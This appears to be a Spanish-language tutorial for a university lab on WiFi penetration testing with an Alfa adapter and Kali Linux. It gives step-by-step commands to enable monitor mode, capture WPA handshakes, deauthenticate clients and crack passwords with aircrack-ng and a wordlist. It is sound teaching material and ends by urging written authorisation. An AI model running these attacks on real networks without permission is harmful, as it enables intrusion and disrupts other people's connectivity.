8.4 KiB
MANUAL PENTESTING WiFi — Alpha AWUS036ACH
Chipset: RTL8812AU | Dual-band 2.4/5GHz
Entorno: Laboratorio universitario con Live Boot USB Kali Linux
PARTE 1: INSTALAR DRIVER EN WINDOWS
Paso 1: Descargar driver
Ve a https://docs.alfa.com.tw/Product/AWUS036ACH/ Descarga el driver Windows (RTL8812AU).
Paso 2: Instalar
- Desconecta la antena
- Ejecuta el instalador como administrador
- Reinicia el PC
- Conecta la antena después de reiniciar
Paso 3: Verificar
Abre PowerShell y ejecuta:
Get-NetAdapter
Deberías ver la interfaz "Realtek 8812AU" con estado "Up".
En Windows solo puedes escanar redes con Acrylic WiFi Free.
Para pentesting REAL necesitas Kali Linux (Parte 2).
PARTE 2: CREAR USB BOOTABLE DE KALI LINUX (CON PERSISTENCIA)
Paso 1: Descargar Kali
Ve a https://www.kali.org/get-kali/
Descarga "Kali Linux 2026.x Installer" (ISO, ~4GB)
Paso 2: Grabar ISO en USB con Rufus
Necesitas: USB de 16GB mínimo + Rufus
- Descarga Rufus desde https://rufus.ie/
- Inserta el USB
- Abre Rufus
- Device = tu USB
- Boot selection = selecciona el ISO de Kali
- Partition scheme = MBR
- Target system = BIOS o UEFI
- Persistent storage → mueve la barra a 8-12 GB
⚠️ ESTO ES LO QUE CREA LA PARTICIÓN PERSISTENTE
Si no la mueves, TODO se pierde al apagar - Haz clic en START
- Selecciona "Write in DD mode" cuando pregunte
- Espera a que termine (~10-15 min)
PARTE 3: ARRANCAR KALI DESDE USB
Paso 1: Configurar BIOS para arrancar desde USB
- Reinicia el PC
- Pulsa F2, F12 o DEL al encender (depende del PC)
- En BIOS ve a "Boot" o "Boot Order"
- Pon "USB-HDD" o "Removable Device" como primera opción
- Guarda y sal (F10 normalmente)
Paso 2: Arrancar Kali
- En el menú de GRUB selecciona "Live system (amd64)"
- Usuario:
kali/ Contraseña:kali
Paso 3: Conectar la antena Alpha
- Conecta la Alpha por USB DESPUÉS de arrancar Kali
- Abre terminal y verifica:
lsusb
# Debe aparecer: Realtek Semiconductor Corp. RTL8812AU
iwconfig
# Debe aparecer: wlan0 o wlan1
Si NO aparece wlan0, instala el driver:
sudo apt update
sudo apt install -y realtek-rtl88xxau-dkms
sudo reboot
PARTE 4: ACTIVAR MODO MONITOR
El modo monitor permite escuchar TODO el tráfico WiFi sin estar conectado a ninguna red. Es la base del pentesting.
# 1. Matar procesos que interfieran
sudo airmon-ng check kill
# 2. Activar modo monitor
sudo airmon-ng start wlan0
# 3. Verificar que está en modo monitor
iwconfig wlan0mon
# Debe decir: "Mode: Monitor"
Si en vez de
wlan0monaparecewlan0en modo monitor,
usawlan0en todos los comandos siguientes.
SALIR del modo monitor cuando termines:
sudo airmon-ng stop wlan0mon
PARTE 5: ESCANEAR REDES WiFi
Este es el paso más importante. Aquí ves TODAS las redes a tu alrededor.
sudo airodump-ng wlan0mon
Columnas de la tabla:
| Columna | Significado |
|---|---|
| BSSID | MAC del punto de acceso (router) |
| PWR | Potencia de señal (-30=excelente, -90=malo) |
| Beacons | Paquetes beacon recibidos |
| #Data | Paquetes de datos capturados |
| CH | Canal (1-13 en 2.4GHz, 36-165 en 5GHz) |
| ENC | Cifrado (WPA2, WPA3, OPN=abierto) |
| ESSID | Nombre de la red WiFi |
PARA PARAR: pulsa Ctrl+C
Consejos para elegir red objetivo:
- PWR entre -30 y -60 = buena señal (lo ideal)
- #Data alto = hay tráfico (clientes activos)
- ENC = WPA2 (el más común, se puede crackear)
- Evita OPN (abierto) y WPA3 (muy difícil)
PARTE 6: CAPTURAR HANDSHAKE DE UNA RED
Una vez elegida tu red objetivo (por ejemplo "CampusLab" canal 6, BSSID AA:BB:CC:DD:EE:FF):
Abre UNA NUEVA terminal (no cierres la de escaneo) y ejecuta:
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w captura wlan0mon
REEMPLAZA:
6→ el canal de tu red objetivoAA:BB:CC:DD:EE:FF→ el BSSID de tu redcaptura→ nombre del archivo de salida
Esto hace:
- Escucha SOLO esa red en su canal
- Guarda todo en archivos:
captura-01.cap,captura-01.csv - Espera a que aparezca un "WPA handshake"
El WPA handshake aparece arriba a la derecha:
WPA handshake: AA:BB:CC:DD:EE:FF
ESTO ES LO QUE NECESITAS para crackear la contraseña.
Si no aparece el handshake, necesitas un cliente conectándose → Parte 7.
PARTE 7: ATAQUE DE DEAUTH (FORZAR HANDSHAKE)
Si el handshake no aparece solo, puedes FORZAR a un cliente a reconectarse. Le desconecta momentáneamente y al reconectarse se captura el handshake.
ABRE UNA TERCERA terminal y ejecuta:
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c XX:XX:XX:XX:XX:XX wlan0mon
REEMPLAZA:
5→ número de paquetes de deauth (5-10 suele bastar)AA:BB:CC:DD:EE:FF→ BSSID del router (igual que antes)XX:XX:XX:XX:XX:XX→ MAC del cliente conectado
Para ver clientes conectados:
Mira la terminal de la Parte 6. Bajo la columna "STATION" verás las MAC de los clientes.
Si no sabes la MAC del cliente, puedes omitir -c:
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon
Esto envía deauth a TODOS los clientes de esa red.
VERIFICA que aparezca "WPA handshake" en la terminal de la Parte 6 después del ataque.
PARTE 8: CRACKEAR LA CONTRASEÑA
Una vez tengas el WPA handshake capturado:
Paso 1: Descomprimir el diccionario
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
Paso 2: Ejecutar aircrack-ng
aircrack-ng -w /usr/share/wordlists/rockyou.txt captura-01.cap
Sustituye captura-01.cap por el nombre de tu archivo.
Esto prueba TODAS las contraseñas del diccionario contra el handshake capturado.
Velocidad: ~1000-5000 claves/segundo.
Si la contraseña está en el diccionario:
KEY FOUND! [ la_contraseña ]
Si no está en el diccionario:
- Prueba con otro diccionario más grande
- O usa fuerza bruta (mucho más lento):
aircrack-ng -a 2 -b AA:BB:CC:DD:EE:FF -w /usr/share/wordlists/rockyou.txt captura-01.cap
PARTE 9: PERSISTENCIA DEL USB (GUARDAR RESULTADOS)
Si usas Kali Live, al reiniciar TODO se pierde a menos que tengas persistencia.
Opción A — Rufus Persistent Partition (ya lo hiciste en Parte 2)
Si activaste "Persistent storage" en Rufus, los archivos en /home/kali se guardan automáticamente entre reinicios.
Opción B — Montar la partición persistente manualmente
# Identificar la partición
lsblk
# Busca la partición más grande del USB (sdb3 normalmente)
# Montar
sudo mkdir -p /mnt/persistence
sudo mount /dev/sdb3 /mnt/persistence
# Copiar resultados
cp captura-01.cap /mnt/persistence/
echo "RED: CampusLab | PASS: la_contraseña" > /mnt/persistence/wifi_cracked.txt
# Desmontar
sudo umount /mnt/persistence
Opción C — Segundo USB o red
# A tu propio USB
cp captura-01.cap /media/kali/MI_USB/
# O subir a un servidor
scp captura-01.cap user@ip_servidor:/ruta/
PARTE 10: GUARDAR LA CONTRASEÑA
echo "RED: CampusLab | PASS: la_contraseña" >> ~/wifi_cracked.txt
cat ~/wifi_cracked.txt
PARTE 11: RESUMEN DE COMANDOS RÁPIDOS
| Paso | Comando |
|---|---|
| Ver antena | lsusb && iwconfig |
| Matar interferencias | sudo airmon-ng check kill |
| Activar monitor | sudo airmon-ng start wlan0 |
| Escanear redes | sudo airodump-ng wlan0mon |
| Capturar 1 red | sudo airodump-ng -c CH --bssid MAC -w file wlan0mon |
| Deauth 1 cliente | sudo aireplay-ng --deauth 5 -a MAC_AP -c MAC_CLI wlan0mon |
| Crackear | aircrack-ng -w rockyou.txt file.cap |
| Salir monitor | sudo airmon-ng stop wlan0mon |
PARTE 12: TIPS PARA EL LABORATORIO UNIVERSITARIO
- Empieza solo con escaneo pasivo (
airodump-ng) — aprende a leer las redes antes de hacer nada activo - Documenta qué redes hay, en qué canales, qué cifrado usan
- Solo testea redes que tengas autorización explícita — pide al profesor/encargado por escrito
- Practica primero con tu propio router si puedes
- El
rockyou.txtviene en Kali en/usr/share/wordlists/(descomprimir consudo gunzip) - No hagas deauth en redes públicas reales — es ilegal sin autorización
- Si la señal es mala (PWR < -70), acércate al router o usa la antena con el reflector parabólico